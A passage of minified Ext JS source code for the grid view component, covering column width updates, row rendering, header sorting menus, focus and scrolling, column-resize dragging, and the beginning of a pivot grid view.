}, syncHeaderScroll:function () {
var a = this.innerHd, b = this.scroller.dom.scrollLeft;
a.scrollLeft = b;
a.scrollLeft = b
}, updateSortIcon:function (d, c) {
var a = this.sortClasses, b = a[c == "DESC" ? 1 : 0], e = this.mainHd.select("td").removeClass(a);
e.item(d).addClass(b)
}, updateAllColumnWidths:function () {
var e = this.getTotalWidth(), k = this.cm.getColumnCount(), m = this.getRows(), g = m.length, b = [], l, a, h, d, c;
for (d = 0; d < k; d++) {
b[d] = this.getColumnWidth(d);
this.getHeaderCell(d).style.width = b[d]
}
this.updateHeaderWidth();
for (d = 0; d < g; d++) {
l = m[d];
l.style.width = e;
a = l.firstChild;
if (a) {
a.style.width = e;
h = a.rows[0];
for (c = 0; c < k; c++) {
h.childNodes[c].style.width = b[c]
}
}
}
this.onAllColumnWidthsUpdated(b, e)
}, updateColumnWidth:function (d, b) {
var c = this.getColumnWidth(d), j = this.getTotalWidth(), h = this.getHeaderCell(d), a = this.getRows(), e = a.length, l, g, k;
this.updateHeaderWidth();
h.style.width = c;
for (g = 0; g < e; g++) {
l = a[g];
k = l.firstChild;
l.style.width = j;
if (k) {
k.style.width = j;
k.rows[0].childNodes[d].style.width = c
}
}
this.onColumnWidthUpdated(d, c, j)
}, updateColumnHidden:function (b, j) {
var h = this.getTotalWidth(), k = j ? "none" : "", g = this.getHeaderCell(b), a = this.getRows(), d = a.length, l, c, e;
this.updateHeaderWidth();
g.style.display = k;
for (e = 0; e < d; e++) {
l = a[e];
l.style.width = h;
c = l.firstChild;
if (c) {
c.style.width = h;
c.rows[0].childNodes[b].style.display = k
}
}
this.onColumnHiddenUpdated(b, j, h);
delete this.lastViewWidth;
this.layout()
}, doRender:function (d, v, m, a, r, t) {
var h = this.templates, c = h.cell, y = h.row, o = r - 1, b = "width:" + this.getTotalWidth() + ";", k = [], l = [], n = {tstyle:b}, q = {}, w = v.length, x, g, e, u, s, p;
for (s = 0; s < w; s++) {
e = v[s];
l = [];
p = s + a;
for (u = 0; u < r; u++) {
g = d[u];
q.id = g.id;
q.css = u === 0 ? "x-grid3-cell-first " : (u == o ? "x-grid3-cell-last " : "");
q.attr = q.cellAttr = "";
q.style = g.style;
q.value = g.renderer.call(g.scope, e.data[g.name], q, e, p, u, m);
if (Ext.isEmpty(q.value)) {
q.value = " "
}
if (this.markDirty && e.dirty && typeof e.modified[g.name] != "undefined") {
q.css += " x-grid3-dirty-cell"
}
l[l.length] = c.apply(q)
}
x = [];
if (t && ((p + 1) % 2 === 0)) {
x[0] = "x-grid3-row-alt"
}
if (e.dirty) {
x[1] = " x-grid3-dirty-row"
}
n.cols = r;
if (this.getRowClass) {
x[2] = this.getRowClass(e, p, n, m)
}
n.alt = x.join(" ");
n.cells = l.join("");
k[k.length] = y.apply(n)
}
return k.join("")
}, processRows:function (a, g) {
if (!this.ds || this.ds.getCount() < 1) {
return
}
var d = this.getRows(), c = d.length, e, b;
g = g || !this.grid.stripeRows;
a = a || 0;
for (b = 0; b < c; b++) {
e = d[b];
if (e) {
e.rowIndex = b;
if (!g) {
e.className = e.className.replace(this.rowClsRe, " ");
if ((b + 1) % 2 === 0) {
e.className += " x-grid3-row-alt"
}
}
}
}
if (a === 0) {
Ext.fly(d[0]).addClass(this.firstRowCls)
}
Ext.fly(d[c - 1]).addClass(this.lastRowCls)
}, afterRender:function () {
if (!this.ds || !this.cm) {
return
}
this.mainBody.dom.innerHTML = this.renderBody() || " ";
this.processRows(0, true);
if (this.deferEmptyText !== true) {
this.applyEmptyText()
}
this.grid.fireEvent("viewready", this.grid)
}, afterRenderUI:function () {
var a = this.grid;
this.initElements();
Ext.fly(this.innerHd).on("click", this.handleHdDown, this);
this.mainHd.on({scope:this, mouseover:this.handleHdOver, mouseout:this.handleHdOut, mousemove:this.handleHdMove});
this.scroller.on("scroll", this.syncScroll, this);
if (a.enableColumnResize !== false) {
this.splitZone = new Ext.grid.GridView.SplitDragZone(a, this.mainHd.dom)
}
if (a.enableColumnMove) {
this.columnDrag = new Ext.grid.GridView.ColumnDragZone(a, this.innerHd);
this.columnDrop = new Ext.grid.HeaderDropZone(a, this.mainHd.dom)
}
if (a.enableHdMenu !== false) {
this.hmenu = new Ext.menu.Menu({id:a.id + "-hctx"});
this.hmenu.add({itemId:"asc", text:this.sortAscText, cls:"xg-hmenu-sort-asc"}, {itemId:"desc", text:this.sortDescText, cls:"xg-hmenu-sort-desc"});
if (a.enableColumnHide !== false) {
this.colMenu = new Ext.menu.Menu({id:a.id + "-hcols-menu"});
this.colMenu.on({scope:this, beforeshow:this.beforeColMenuShow, itemclick:this.handleHdMenuClick});
this.hmenu.add("-", {itemId:"columns", hideOnClick:false, text:this.columnsText, menu:this.colMenu, iconCls:"x-cols-icon"})
}
this.hmenu.on("itemclick", this.handleHdMenuClick, this)
}
if (a.trackMouseOver) {
this.mainBody.on({scope:this, mouseover:this.onRowOver, mouseout:this.onRowOut})
}
if (a.enableDragDrop || a.enableDrag) {
this.dragZone = new Ext.grid.GridDragZone(a, {ddGroup:a.ddGroup || "GridDD"})
}
this.updateHeaderSortState()
}, renderUI:function () {
var a = this.templates;
return a.master.apply({body:a.body.apply({rows:" "}), header:this.renderHeaders(), ostyle:"width:" + this.getOffsetWidth() + ";", bstyle:"width:" + this.getTotalWidth() + ";"})
}, processEvent:function (b, h) {
var i = h.getTarget(), a = this.grid, d = this.findHeaderIndex(i), k, j, c, g;
a.fireEvent(b, h);
if (d !== false) {
a.fireEvent("header" + b, a, d, h)
} else {
k = this.findRowIndex(i);
if (k !== false) {
j = this.findCellIndex(i);
if (j !== false) {
c = a.colModel.getColumnAt(j);
if (a.fireEvent("cell" + b, a, k, j, h) !== false) {
if (!c || (c.processEvent && (c.processEvent(b, h, a, k, j) !== false))) {
a.fireEvent("row" + b, a, k, h)
}
}
} else {
if (a.fireEvent("row" + b, a, k, h) !== false) {
(g = this.findRowBody(i)) && a.fireEvent("rowbody" + b, a, k, h)
}
}
} else {
a.fireEvent("container" + b, a, h)
}
}
}, layout:function (j) {
if (!this.mainBody) {
return
}
var a = this.grid, d = a.getGridEl(), c = d.getSize(true), i = c.width, b = c.height, h = this.scroller, g, e, k;
if (i < 20 || b < 20) {
return
}
if (a.autoHeight) {
g = h.dom.style;
g.overflow = "visible";
if (Ext.isWebKit) {
g.position = "static"
}
} else {
this.el.setSize(i, b);
e = this.mainHd.getHeight();
k = b - e;
h.setSize(i, k);
if (this.innerHd) {
this.innerHd.style.width = (i) + "px"
}
}
if (this.forceFit || (j === true && this.autoFill)) {
if (this.lastViewWidth != i) {
this.fitColumns(false, false);
this.lastViewWidth = i
}
} else {
this.autoExpand();
this.syncHeaderScroll()
}
this.onLayout(i, k)
}, onLayout:function (a, b) {
}, onColumnWidthUpdated:function (c, a, b) {
}, onAllColumnWidthsUpdated:function (a, b) {
}, onColumnHiddenUpdated:function (b, c, a) {
}, updateColumnText:function (a, b) {
}, afterMove:function (a) {
}, init:function (a) {
this.grid = a;
this.initTemplates();
this.initData(a.store, a.colModel);
this.initUI(a)
}, getColumnId:function (a) {
return this.cm.getColumnId(a)
}, getOffsetWidth:function () {
return(this.cm.getTotalWidth() + this.getScrollOffset()) + "px"
}, getScrollOffset:function () {
return Ext.num(this.scrollOffset, Ext.getScrollBarWidth())
}, renderHeaders:function () {
var e = this.cm, g = this.templates, a = g.hcell, d = {}, h = e.getColumnCount(), j = h - 1, k = [], c, b;
for (c = 0; c < h; c++) {
if (c == 0) {
b = "x-grid3-cell-first "
} else {
b = c == j ? "x-grid3-cell-last " : ""
}
d = {id:e.getColumnId(c), value:e.getColumnHeader(c) || "", style:this.getColumnStyle(c, true), css:b, tooltip:this.getColumnTooltip(c)};
if (e.config[c].align == "right") {
d.istyle = "padding-right: 16px;"
} else {
delete d.istyle
}
k[c] = a.apply(d)
}
return g.header.apply({cells:k.join(""), tstyle:String.format("width: {0};", this.getTotalWidth())})
}, getColumnTooltip:function (a) {
var b = this.cm.getColumnTooltip(a);
if (b) {
if (Ext.QuickTips.isEnabled()) {
return'ext:qtip="' + b + '"'
} else {
return'title="' + b + '"'
}
}
return""
}, beforeUpdate:function () {
this.grid.stopEditing(true)
}, updateHeaders:function () {
this.innerHd.firstChild.innerHTML = this.renderHeaders();
this.updateHeaderWidth(false)
}, updateHeaderWidth:function (c) {
var b = this.innerHd.firstChild, a = this.getTotalWidth();
b.style.width = this.getOffsetWidth();
b.firstChild.style.width = a;
if (c !== false) {
this.mainBody.dom.style.width = a
}
}, focusRow:function (a) {
this.focusCell(a, 0, false)
}, focusCell:function (d, b, c) {
this.syncFocusEl(this.ensureVisible(d, b, c));
var a = this.focusEl;
if (Ext.isGecko) {
a.focus()
} else {
a.focus.defer(1, a)
}
}, resolveCell:function (h, d, g) {
if (!Ext.isNumber(h)) {
h = h.rowIndex
}
if (!this.ds) {
return null
}
if (h < 0 || h >= this.ds.getCount()) {
return null
}
d = (d !== undefined ? d : 0);
var c = this.getRow(h), b = this.cm, e = b.getColumnCount(), a;
if (!(g === false && d === 0)) {
while (d < e && b.isHidden(d)) {
d++
}
a = this.getCell(h, d)
}
return{row:c, cell:a}
}, getResolvedXY:function (b) {
if (!b) {
return null
}
var a = b.cell, c = b.row;
if (a) {
return Ext.fly(a).getXY()
} else {
return[this.el.getX(), Ext.fly(c).getY()]
}
}, syncFocusEl:function (d, a, c) {
var b = d;
if (!Ext.isArray(b)) {
d = Math.min(d, Math.max(0, this.getRows().length - 1));
if (isNaN(d)) {
return
}
b = this.getResolvedXY(this.resolveCell(d, a, c))
}
this.focusEl.setXY(b || this.scroller.getXY())
}, ensureVisible:function (t, g, e) {
var r = this.resolveCell(t, g, e);
if (!r || !r.row) {
return null
}
var k = r.row, h = r.cell, n = this.scroller.dom, d = k, s = 0, o = this.el.dom;
while (d && d != o) {
s += d.offsetTop;
d = d.offsetParent
}
s -= this.mainHd.dom.offsetHeight;
o = parseInt(n.scrollTop, 10);
var q = s + k.offsetHeight, a = n.clientHeight, m = o + a;
if (s < o) {
n.scrollTop = s
} else {
if (q > m) {
n.scrollTop = q - a
}
}
if (e !== false) {
var l = parseInt(h.offsetLeft, 10), j = l + h.offsetWidth, i = parseInt(n.scrollLeft, 10), b = i + n.clientWidth;
if (l < i) {
n.scrollLeft = l
} else {
if (j > b) {
n.scrollLeft = j - n.clientWidth
}
}
}
return this.getResolvedXY(r)
}, insertRows:function (a, i, e, h) {
var d = a.getCount() - 1;
if (!h && i === 0 && e >= d) {
this.fireEvent("beforerowsinserted", this, i, e);
this.refresh();
this.fireEvent("rowsinserted", this, i, e)
} else {
if (!h) {
this.fireEvent("beforerowsinserted", this, i, e)
}
var b = this.renderRows(i, e), g = this.getRow(i);
if (g) {
if (i === 0) {
Ext.fly(this.getRow(0)).removeClass(this.firstRowCls)
}
Ext.DomHelper.insertHtml("beforeBegin", g, b)
} else {
var c = this.getRow(d - 1);
if (c) {
Ext.fly(c).removeClass(this.lastRowCls)
}
Ext.DomHelper.insertHtml("beforeEnd", this.mainBody.dom, b)
}
if (!h) {
this.processRows(i);
this.fireEvent("rowsinserted", this, i, e)
} else {
if (i === 0 || i >= d) {
Ext.fly(this.getRow(i)).addClass(i === 0 ? this.firstRowCls : this.lastRowCls)
}
}
}
this.syncFocusEl(i)
}, deleteRows:function (a, c, b) {
if (a.getRowCount() < 1) {
this.refresh()
} else {
this.fireEvent("beforerowsdeleted", this, c, b);
this.removeRows(c, b);
this.processRows(c);
this.fireEvent("rowsdeleted", this, c, b)
}
}, getColumnStyle:function (b, d) {
var a = this.cm, g = a.config, c = d ? "" : g[b].css || "", e = g[b].align;
c += String.format("width: {0};", this.getColumnWidth(b));
if (a.isHidden(b)) {
c += "display: none; "
}
if (e) {
c += String.format("text-align: {0};", e)
}
return c
}, getColumnWidth:function (b) {
var c = this.cm.getColumnWidth(b), a = this.borderWidth;
if (Ext.isNumber(c)) {
if (Ext.isBorderBox || (Ext.isWebKit && !Ext.isSafari2)) {
return c + "px"
} else {
return Math.max(c - a, 0) + "px"
}
} else {
return c
}
}, getTotalWidth:function () {
return this.cm.getTotalWidth() + "px"
}, fitColumns:function (g, j, h) {
var a = this.grid, l = this.cm, s = l.getTotalWidth(false), q = this.getGridInnerWidth(), r = q - s, c = [], o = 0, n = 0, u, d, p;
if (q < 20 || r === 0) {
return false
}
var e = l.getColumnCount(true), m = l.getColumnCount(false), b = e - (Ext.isNumber(h) ? 1 : 0);
if (b === 0) {
b = 1;
h = undefined
}
for (p = 0; p < m; p++) {
if (!l.isFixed(p) && p !== h) {
u = l.getColumnWidth(p);
c.push(p, u);
if (!l.isHidden(p)) {
o = p;
n += u
}
}
}
d = (q - l.getTotalWidth()) / n;
while (c.length) {
u = c.pop();
p = c.pop();
l.setColumnWidth(p, Math.max(a.minColumnWidth, Math.floor(u + u * d)), true)
}
s = l.getTotalWidth(false);
if (s > q) {
var t = (b == e) ? o : h, k = Math.max(1, l.getColumnWidth(t) - (s - q));
l.setColumnWidth(t, k, true)
}
if (g !== true) {
this.updateAllColumnWidths()
}
return true
}, autoExpand:function (k) {
var a = this.grid, i = this.cm, e = this.getGridInnerWidth(), c = i.getTotalWidth(false), g = a.autoExpandColumn;
if (!this.userResized && g) {
if (e != c) {
var j = i.getIndexById(g), b = i.getColumnWidth(j), h = e - c + b, d = Math.min(Math.max(h, a.autoExpandMin), a.autoExpandMax);
if (b != d) {
i.setColumnWidth(j, d, true);
if (k !== true) {
this.updateColumnWidth(j, d)
}
}
}
}
}, getGridInnerWidth:function () {
return this.grid.getGridEl().getWidth(true) - this.getScrollOffset()
}, getColumnData:function () {
var e = [], c = this.cm, g = c.getColumnCount(), a = this.ds.fields, d, b;
for (d = 0; d < g; d++) {
b = c.getDataIndex(d);
e[d] = {name:Ext.isDefined(b) ? b : (a.get(d) ? a.get(d).name : undefined), renderer:c.getRenderer(d), scope:c.getRendererScope(d), id:c.getColumnId(d), style:this.getColumnStyle(d)}
}
return e
}, renderRows:function (i, c) {
var a = this.grid, g = a.store, j = a.stripeRows, e = a.colModel, h = e.getColumnCount(), d = g.getCount(), b;
if (d < 1) {
return""
}
i = i || 0;
c = Ext.isDefined(c) ? c : d - 1;
b = g.getRange(i, c);
return this.doRender(this.getColumnData(), b, g, i, h, j)
}, renderBody:function () {
var a = this.renderRows() || " ";
return this.templates.body.apply({rows:a})
}, refreshRow:function (g) {
var l = this.ds, m = this.cm.getColumnCount(), c = this.getColumnData(), n = m - 1, p = ["x-grid3-row"], e = {tstyle:String.format("width: {0};", this.getTotalWidth())}, a = [], k = this.templates.cell, j, q, b, o, h, d;
if (Ext.isNumber(g)) {
j = g;
g = l.getAt(j)
} else {
j = l.indexOf(g)
}
if (!g || j < 0) {
return
}
for (d = 0; d < m; d++) {
b = c[d];
if (d == 0) {
h = "x-grid3-cell-first"
} else {
h = (d == n) ? "x-grid3-cell-last " : ""
}
o = {id:b.id, style:b.style, css:h, attr:"", cellAttr:""};
o.value = b.renderer.call(b.scope, g.data[b.name], o, g, j, d, l);
if (Ext.isEmpty(o.value)) {
o.value = " "
}
if (this.markDirty && g.dirty && typeof g.modified[b.name] != "undefined") {
o.css += " x-grid3-dirty-cell"
}
a[d] = k.apply(o)
}
q = this.getRow(j);
q.className = "";
if (this.grid.stripeRows && ((j + 1) % 2 === 0)) {
p.push("x-grid3-row-alt")
}
if (this.getRowClass) {
e.cols = m;
p.push(this.getRowClass(g, j, e, l))
}
this.fly(q).addClass(p).setStyle(e.tstyle);
e.cells = a.join("");
q.innerHTML = this.templates.rowInner.apply(e);
this.fireEvent("rowupdated", this, j, g)
}, refresh:function (b) {
this.fireEvent("beforerefresh", this);
this.grid.stopEditing(true);
var a = this.renderBody();
this.mainBody.update(a).setWidth(this.getTotalWidth());
if (b === true) {
this.updateHeaders();
this.updateHeaderSortState()
}
this.processRows(0, true);
this.layout();
this.applyEmptyText();
this.fireEvent("refresh", this)
}, applyEmptyText:function () {
if (this.emptyText && !this.hasRows()) {
this.mainBody.update('<div class="x-grid-empty">' + this.emptyText + "</div>")
}
}, updateHeaderSortState:function () {
var b = this.ds.getSortState();
if (!b) {
return
}
if (!this.sortState || (this.sortState.field != b.field || this.sortState.direction != b.direction)) {
this.grid.fireEvent("sortchange", this.grid, b)
}
this.sortState = b;
var c = this.cm.findColumnIndex(b.field);
if (c != -1) {
var a = b.direction;
this.updateSortIcon(c, a)
}
}, clearHeaderSortState:function () {
if (!this.sortState) {
return
}
this.grid.fireEvent("sortchange", this.grid, null);
this.mainHd.select("td").removeClass(this.sortClasses);
delete this.sortState
}, destroy:function () {
var j = this, a = j.grid, d = a.getGridEl(), i = j.dragZone, g = j.splitZone, h = j.columnDrag, e = j.columnDrop, k = j.scrollToTopTask, c, b;
if (k && k.cancel) {
k.cancel()
}
Ext.destroyMembers(j, "colMenu", "hmenu");
j.initData(null, null);
j.purgeListeners();
Ext.fly(j.innerHd).un("click", j.handleHdDown, j);
if (a.enableColumnMove) {
c = h.dragData;
b = h.proxy;
Ext.destroy(h.el, b.ghost, b.el, e.el, e.proxyTop, e.proxyBottom, c.ddel, c.header);
if (b.anim) {
Ext.destroy(b.anim)
}
delete b.ghost;
delete c.ddel;
delete c.header;
h.destroy();
delete Ext.dd.DDM.locationCache[h.id];
delete h._domRef;
delete e.proxyTop;
delete e.proxyBottom;
e.destroy();
delete Ext.dd.DDM.locationCache["gridHeader" + d.id];
delete e._domRef;
delete Ext.dd.DDM.ids[e.ddGroup]
}
if (g) {
g.destroy();
delete g._domRef;
delete Ext.dd.DDM.ids["gridSplitters" + d.id]
}
Ext.fly(j.innerHd).removeAllListeners();
Ext.removeNode(j.innerHd);
delete j.innerHd;
Ext.destroy(j.el, j.mainWrap, j.mainHd, j.scroller, j.mainBody, j.focusEl, j.resizeMarker, j.resizeProxy, j.activeHdBtn, j._flyweight, i, g);
delete a.container;
if (i) {
i.destroy()
}
Ext.dd.DDM.currentTarget = null;
delete Ext.dd.DDM.locationCache[d.id];
Ext.EventManager.removeResizeListener(j.onWindowResize, j)
}, onDenyColumnHide:function () {
}, render:function () {
if (this.autoFill) {
var a = this.grid.ownerCt;
if (a && a.getLayout()) {
a.on("afterlayout", function () {
this.fitColumns(true, true);
this.updateHeaders();
this.updateHeaderSortState()
}, this, {single:true})
}
} else {
if (this.forceFit) {
this.fitColumns(true, false)
} else {
if (this.grid.autoExpandColumn) {
this.autoExpand(true)
}
}
}
this.grid.getGridEl().dom.innerHTML = this.renderUI();
this.afterRenderUI()
}, initData:function (a, e) {
var b = this;
if (b.ds) {
var d = b.ds;
d.un("add", b.onAdd, b);
d.un("load", b.onLoad, b);
d.un("clear", b.onClear, b);
d.un("remove", b.onRemove, b);
d.un("update", b.onUpdate, b);
d.un("datachanged", b.onDataChange, b);
if (d !== a && d.autoDestroy) {
d.destroy()
}
}
if (a) {
a.on({scope:b, load:b.onLoad, add:b.onAdd, remove:b.onRemove, update:b.onUpdate, clear:b.onClear, datachanged:b.onDataChange})
}
if (b.cm) {
var c = b.cm;
c.un("configchange", b.onColConfigChange, b);
c.un("widthchange", b.onColWidthChange, b);
c.un("headerchange", b.onHeaderChange, b);
c.un("hiddenchange", b.onHiddenChange, b);
c.un("columnmoved", b.onColumnMove, b)
}
if (e) {
delete b.lastViewWidth;
e.on({scope:b, configchange:b.onColConfigChange, widthchange:b.onColWidthChange, headerchange:b.onHeaderChange, hiddenchange:b.onHiddenChange, columnmoved:b.onColumnMove})
}
b.ds = a;
b.cm = e
}, onDataChange:function () {
this.refresh(true);
this.updateHeaderSortState();
this.syncFocusEl(0)
}, onClear:function () {
this.refresh();
this.syncFocusEl(0)
}, onUpdate:function (b, a) {
this.refreshRow(a)
}, onAdd:function (b, a, c) {
this.insertRows(b, c, c + (a.length - 1))
}, onRemove:function (b, a, c, d) {
if (d !== true) {
this.fireEvent("beforerowremoved", this, c, a)
}
this.removeRow(c);
if (d !== true) {
this.processRows(c);
this.applyEmptyText();
this.fireEvent("rowremoved", this, c, a)
}
}, onLoad:function () {
if (Ext.isGecko) {
if (!this.scrollToTopTask) {
this.scrollToTopTask = new Ext.util.DelayedTask(this.scrollToTop, this)
}
this.scrollToTopTask.delay(1)
} else {
this.scrollToTop()
}
}, onColWidthChange:function (a, b, c) {
this.updateColumnWidth(b, c)
}, onHeaderChange:function (a, b, c) {
this.updateHeaders()
}, onHiddenChange:function (a, b, c) {
this.updateColumnHidden(b, c)
}, onColumnMove:function (a, c, b) {
this.indexMap = null;
this.refresh(true);
this.restoreScroll(this.getScrollState());
this.afterMove(b);
this.grid.fireEvent("columnmove", c, b)
}, onColConfigChange:function () {
delete this.lastViewWidth;
this.indexMap = null;
this.refresh(true)
}, initUI:function (a) {
a.on("headerclick", this.onHeaderClick, this)
}, initEvents:Ext.emptyFn, onHeaderClick:function (b, a) {
if (this.headersDisabled || !this.cm.isSortable(a)) {
return
}
b.stopEditing(true);
b.store.sort(this.cm.getDataIndex(a))
}, onRowOver:function (b, a) {
var c = this.findRowIndex(a);
if (c !== false) {
this.addRowClass(c, this.rowOverCls)
}
}, onRowOut:function (b, a) {
var c = this.findRowIndex(a);
if (c !== false && !b.within(this.getRow(c), true)) {
this.removeRowClass(c, this.rowOverCls)
}
}, onRowSelect:function (a) {
this.addRowClass(a, this.selectedRowClass)
}, onRowDeselect:function (a) {
this.removeRowClass(a, this.selectedRowClass)
}, onCellSelect:function (c, b) {
var a = this.getCell(c, b);
if (a) {
this.fly(a).addClass("x-grid3-cell-selected")
}
}, onCellDeselect:function (c, b) {
var a = this.getCell(c, b);
if (a) {
this.fly(a).removeClass("x-grid3-cell-selected")
}
}, handleWheel:function (a) {
a.stopPropagation()
}, onColumnSplitterMoved:function (a, b) {
this.userResized = true;
this.grid.colModel.setColumnWidth(a, b, true);
if (this.forceFit) {
this.fitColumns(true, false, a);
this.updateAllColumnWidths()
} else {
this.updateColumnWidth(a, b);
this.syncHeaderScroll()
}
this.grid.fireEvent("columnresize", a, b)
}, beforeColMenuShow:function () {
var b = this.cm, d = b.getColumnCount(), a = this.colMenu, c;
a.removeAll();
for (c = 0; c < d; c++) {
if (b.config[c].hideable !== false) {
a.add(new Ext.menu.CheckItem({text:b.getColumnHeader(c), itemId:"col-" + b.getColumnId(c), checked:!b.isHidden(c), disabled:b.config[c].hideable === false, hideOnClick:false}))
}
}
}, handleHdMenuClick:function (c) {
var a = this.ds, b = this.cm.getDataIndex(this.hdCtxIndex);
switch (c.getItemId()) {
case"asc":
a.sort(b, "ASC");
break;
case"desc":
a.sort(b, "DESC");
break;
default:
this.handleHdMenuClickDefault(c)
}
return true
}, handleHdMenuClickDefault:function (c) {
var b = this.cm, d = c.getItemId(), a = b.getIndexById(d.substr(4));
if (a != -1) {
if (c.checked && b.getColumnsBy(this.isHideableColumn, this).length <= 1) {
this.onDenyColumnHide();
return
}
b.setHidden(a, c.checked)
}
}, handleHdDown:function (i, j) {
if (Ext.fly(j).hasClass("x-grid3-hd-btn")) {
i.stopEvent();
var k = this.cm, g = this.findHeaderCell(j), h = this.getCellIndex(g), d = k.isSortable(h), c = this.hmenu, b = c.items, a = this.headerMenuOpenCls;
this.hdCtxIndex = h;
Ext.fly(g).addClass(a);
b.get("asc").setDisabled(!d);
b.get("desc").setDisabled(!d);
c.on("hide", function () {
Ext.fly(g).removeClass(a)
}, this, {single:true});
c.show(j, "tl-bl?")
}
}, handleHdMove:function (k) {
var i = this.findHeaderCell(this.activeHdRef);
if (i && !this.headersDisabled) {
var l = this.splitHandleWidth || 5, j = this.activeHdRegion, p = i.style, m = this.cm, o = "", g = k.getPageX();
if (this.grid.enableColumnResize !== false) {
var a = this.activeHdIndex, b = this.getPreviousVisible(a), n = m.isResizable(a), c = b && m.isResizable(b), d = g - j.left <= l, h = j.right - g <= (!this.activeHdBtn ? l : 2);
if (d && c) {
o = Ext.isAir ? "move" : Ext.isWebKit ? "e-resize" : "col-resize"
} else {
if (h && n) {
o = Ext.isAir ? "move" : Ext.isWebKit ? "w-resize" : "col-resize"
}
}
}
p.cursor = o
}
}, getPreviousVisible:function (a) {
while (a > 0) {
if (!this.cm.isHidden(a - 1)) {
return a
}
a--
}
return undefined
}, handleHdOver:function (c, b) {
var d = this.findHeaderCell(b);
if (d && !this.headersDisabled) {
var a = this.fly(d);
this.activeHdRef = b;
this.activeHdIndex = this.getCellIndex(d);
this.activeHdRegion = a.getRegion();
if (!this.isMenuDisabled(this.activeHdIndex, a)) {
a.addClass("x-grid3-hd-over");
this.activeHdBtn = a.child(".x-grid3-hd-btn");
if (this.activeHdBtn) {
this.activeHdBtn.dom.style.height = (d.firstChild.offsetHeight - 1) + "px"
}
}
}
}, handleHdOut:function (b, a) {
var c = this.findHeaderCell(a);
if (c && (!Ext.isIE || !b.within(c, true))) {
this.activeHdRef = null;
this.fly(c).removeClass("x-grid3-hd-over");
c.style.cursor = ""
}
}, isMenuDisabled:function (a, b) {
return this.cm.isMenuDisabled(a)
}, hasRows:function () {
var a = this.mainBody.dom.firstChild;
return a && a.nodeType == 1 && a.className != "x-grid-empty"
}, isHideableColumn:function (a) {
return !a.hidden
}, bind:function (a, b) {
this.initData(a, b)
}});
Ext.grid.GridView.SplitDragZone = Ext.extend(Ext.dd.DDProxy, {constructor:function (a, b) {
this.grid = a;
this.view = a.getView();
this.marker = this.view.resizeMarker;
this.proxy = this.view.resizeProxy;
Ext.grid.GridView.SplitDragZone.superclass.constructor.call(this, b, "gridSplitters" + this.grid.getGridEl().id, {dragElId:Ext.id(this.proxy.dom), resizeFrame:false});
this.scroll = false;
this.hw = this.view.splitHandleWidth || 5
}, b4StartDrag:function (a, e) {
this.dragHeadersDisabled = this.view.headersDisabled;
this.view.headersDisabled = true;
var d = this.view.mainWrap.getHeight();
this.marker.setHeight(d);
this.marker.show();
this.marker.alignTo(this.view.getHeaderCell(this.cellIndex), "tl-tl", [-2, 0]);
this.proxy.setHeight(d);
var b = this.cm.getColumnWidth(this.cellIndex), c = Math.max(b - this.grid.minColumnWidth, 0);
this.resetConstraints();
this.setXConstraint(c, 1000);
this.setYConstraint(0, 0);
this.minX = a - c;
this.maxX = a + 1000;
this.startPos = a;
Ext.dd.DDProxy.prototype.b4StartDrag.call(this, a, e)
}, allowHeaderDrag:function (a) {
return true
}, handleMouseDown:function (a) {
var h = this.view.findHeaderCell(a.getTarget());
if (h && this.allowHeaderDrag(a)) {
var k = this.view.fly(h).getXY(), c = k[0], i = a.getXY(), b = i[0], g = h.offsetWidth, d = false;
if ((b - c) <= this.hw) {
d = -1
} else {
if ((c + g) - b <= this.hw) {
d = 0
}
}
if (d !== false) {
this.cm = this.grid.colModel;
var j = this.view.getCellIndex(h);
if (d == -1) {
if (j + d < 0) {
return
}
while (this.cm.isHidden(j + d)) {
--d;
if (j + d < 0) {
return
}
}
}
this.cellIndex = j + d;
this.split = h.dom;
if (this.cm.isResizable(this.cellIndex) && !this.cm.isFixed(this.cellIndex)) {
Ext.grid.GridView.SplitDragZone.superclass.handleMouseDown.apply(this, arguments)
}
} else {
if (this.view.columnDrag) {
this.view.columnDrag.callHandleMouseDown(a)
}
}
}
}, endDrag:function (g) {
this.marker.hide();
var a = this.view, c = Math.max(this.minX, g.getPageX()), d = c - this.startPos, b = this.dragHeadersDisabled;
a.onColumnSplitterMoved(this.cellIndex, this.cm.getColumnWidth(this.cellIndex) + d);
setTimeout(function () {
a.headersDisabled = b
}, 50)
}, autoOffset:function () {
this.setDelta(0, 0)
}});
Ext.grid.PivotGridView = Ext.extend(Ext.grid.GridView, {colHeaderCellCls:"grid-hd-group-cell", title:"", getColumnHeaders:function () {
return this.grid.topAxis.buildHeaders()
}, getRowHeaders:function () {
return this.grid.leftAxis.buildHeaders()
}, renderRows:function (a, t) {
var b = this.grid, o = b.extractData(), p = o.length, g = this.templates, s = b.renderer, h = typeof s == "function", w = this.getCellCls, n = typeof w == "function", d = g.cell, x = g.row, k = [], q = {}, c = "width:" + this.getGridInnerWidth() + "px;", l, r, e, v, m;
a = a || 0;
t = Ext.isDefined(t) ? t : p - 1;
for (v = 0; v < p; v++) {
m = o[v];
r = m.length;
l = [];
for (var u = 0; u < r; u++) {
q.id = v + "-" + u;
q.css = u === 0 ? "x-grid3-cell-first " : (u == (r - 1) ? "x-grid3-cell-last " : "");
q.attr = q.cellAttr = "";
q.value = m[u];
if (Ext.isEmpty(q.value)) {
q.value = " "
}
if (h) {
q.value = s(q.value)
}
if (n) {
q.css += w(q.value) + " "
}
l[l.length] = d.apply(q)
}
k[k.length] = x.apply({tstyle:c, cols:r, cells:l.join(""), alt:""})
}
return k.join("")
}, masterTpl:new Ext.Template('<div class="x-grid3 x-pivotgrid" hidefocus="true">', '<div class="x-grid3-viewport">', '<div class="x-grid3-header">', '<div class="x-grid3-header-title"><span>{title}</span></div>', '<div class="x-grid3-header-inner">', '<div class="x-grid3-header-offset" style="{ostyle}"></div>', "</div>", '<div class="x-clear"></div>', "</div>", '<div class="x-grid3-scroller">', '<div class="x-grid3-row-headers"></div>', '<div class="x-grid3-body" style="{bstyle}">{body}</div>', '<a href="#" class="x-grid3-focus" tabIndex="-1"></a>', "</div>", "</div>", '<div class="x-grid3-resize-marker"> </div>', '<div class="x-grid3-resize-proxy"> </div>', "</div>"), initTemplates:function () {
Ext.grid.PivotGridView.superclass.initTemplates.apply(this, arguments);
var a = this.templates || {};
if (!a.gcell) {
